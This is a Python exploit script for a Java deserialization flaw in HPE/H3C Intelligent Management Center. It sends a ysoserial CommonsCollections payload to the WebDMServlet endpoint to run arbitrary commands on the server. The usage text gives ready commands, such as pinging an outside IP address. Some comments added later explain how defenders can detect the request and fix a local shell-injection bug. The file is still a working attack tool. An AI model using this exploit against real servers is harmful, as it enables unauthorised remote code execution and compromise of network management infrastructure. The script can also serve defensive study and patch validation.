#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning. exploit() posts with verify=False,
# so this script never validates the server's TLS certificate.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Default target; replaced by sys.argv[1] in the __main__ block.
host = "127.0.0.1:8080"
# File the serialized payload is read from; in -payload-string mode the
# ysoserial output is written to a file of this name first.
payload_file = "payload.bin"
# Not referenced anywhere else in the visible script.
body = ""
def printUsage () :
    """Print the command-line help banner for both payload modes.

    Every line is written to stdout in order; the script name shown in the
    usage and example lines is taken from sys.argv[0].
    """
    prog = sys.argv[0]
    banner = [
        "......................................................................................................................",
        ".",
        ". HPE/H3C - IMC Java Deserialization Exploit",
        ".",
        ". Example 1: -payload-binary",
        ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % prog,
        ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % prog,
        ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) ",
        ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin",
        ". 2. Send request to server",
        ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % prog,
        ".",
        ". Example 2: -payload-string",
        '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % prog,
        '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % prog,
        ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)",
        '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % prog,
        ".",
        "......................................................................................................................",
    ]
    # A single parenthesised argument prints the same text under the
    # Python 2 print statement and the Python 3 print function.
    for text in banner:
        print(text)
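def loadPayloadFile (_fileName) :
    """Return the raw bytes of the payload file at *_fileName*.

    The file is opened in binary mode so the serialized object is passed on
    unmodified. The handle is closed as soon as the read completes; the
    original left it open until interpreter exit.

    Raises IOError/OSError if the file cannot be opened or read.
    """
    print("[+] Load payload file %s" % _fileName)
    with open(_fileName, 'rb') as payloadFile:
        return payloadFile.read()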
def exploit (_payload) :
    """POST *_payload* to the WebDMServlet endpoint and return the response.

    The target base URL is read from sys.argv[1], not from a parameter, and
    the fixed path /imc/topo/WebDMServlet is appended to it. The body is sent
    as-is; this code attaches no credentials, cookies or content type.
    verify=False turns off TLS certificate validation for the request.

    Defender note: on the wire this is a POST to /imc/topo/WebDMServlet whose
    body is a raw Java serialization stream (such streams normally start with
    the bytes AC ED 00 05). That makes the request straightforward to match in
    proxy or WAF logs, and restricting access to the IMC web interface narrows
    the exposure.
    """
    target = sys.argv[1] + "/imc/topo/WebDMServlet"
    print("[+] Sending exploit to %s" % (target))
    return requests.post(target, data=_payload, verify=False)
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
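if __name__ == "__main__":
    # Expected arguments:
    #   <script> http[s]://<IP>:<PORT> -payload-binary FILE
    #   <script> http[s]://<IP>:<PORT> -payload-string "COMMAND"
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)
    else:
        print("------------------------------------------")
        print("- HPE/H3C - IMC Java Deserialization Exploit -")
        print("------------------------------------------")
        host = sys.argv[1]
        print("[*] Connecting to %s" % host)
        if sys.argv[2] == "-payload-binary":
            # Send a payload file that was generated beforehand.
            payload_file = sys.argv[3]
            if os.path.isfile(payload_file):
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                # showResponse() exists only as commented-out code in this
                # file, so calling it raised NameError after the request had
                # been sent. Report completion the same way the
                # -payload-string branch does.
                print("[+] Response received, exploit finished.")
            else:
                print("[-] Can't load payload file")
        elif sys.argv[2] == "-payload-string":
            if os.path.isfile("ysoserial.jar"):
                import subprocess

                sPayload = sys.argv[3]
                # Shown to the operator in the same form as before.
                shown = "java -jar ysoserial.jar CommonsCollections5 '" + sPayload + "' > payload.bin"
                print("[+] Create payload file (%s) " % shown)
                # Run java with an argument list and redirect stdout in
                # Python. The original concatenated argv[3] into an
                # os.system() string, so a quote in the argument was parsed
                # by the local shell and could run extra commands locally.
                command = ["java", "-jar", "ysoserial.jar", "CommonsCollections5", sPayload]
                try:
                    with open(payload_file, "wb") as out:
                        status = subprocess.call(command, stdout=out)
                except OSError as err:
                    print("[-] Can't run java: %s" % err)
                    status = 1
                if status == 0:
                    payload = loadPayloadFile(payload_file)
                    response = exploit(payload)
                    print("[+] Response received, exploit finished.")
                else:
                    # The original ignored the exit status and sent whatever
                    # was in payload.bin, possibly an empty file.
                    print("[-] Payload generation failed, nothing sent")
            else:
                print("[-] Can't load ysoserial.jar")
        else:
            printUsage()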